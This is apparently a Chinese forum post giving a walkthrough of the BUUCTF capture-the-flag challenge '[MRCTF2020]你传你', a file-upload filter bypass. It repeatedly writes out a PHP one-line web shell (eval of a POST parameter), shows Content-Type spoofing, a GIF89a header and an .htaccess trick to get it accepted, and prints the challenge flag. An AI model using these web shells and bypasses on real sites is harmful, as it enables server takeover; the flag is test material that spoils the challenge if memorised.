登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
BUUCTF靶场24 -- [MRCTF2020]你传你
第一步:直接传1.php
[PHP] 纯文本查看 复制代码 <?php @eval($_POST['x']);?>
返回:我扌your problem?
第二步:试用各种文件后缀,如1.phtml
[PHP] 纯文本查看 复制代码 <?php @eval($_POST['x']);?>
返回:我扌your problem?
第三步:修改Content-Type,如image/png
[PHP] 纯文本查看 复制代码 <?php @eval($_POST['x']);?>
返回:我扌your problem?
第四步:修改文件头,如GIF89a
[PHP] 纯文本查看 复制代码 GIF89a<?php @eval($_POST['x']);?>
返回:我扌your problem?
第五步:修改文件内容<?
[PHP] 纯文本查看 复制代码 GIF89a<script language="php">@eval($_POST['x'])</script>
返回:我扌your problem?
第六步:试用png+.htaccess
[PHP] 纯文本查看 复制代码 GIF89a<script language="php">@eval($_POST['x'])</script>
上传成功
注意:.htaccess也要修改Content-Type为png才可以上传成功。
第七步:连接一句话木马,获取flag
flag{858c49f4-448d-4026-ac33-ba91b577f9a9}
|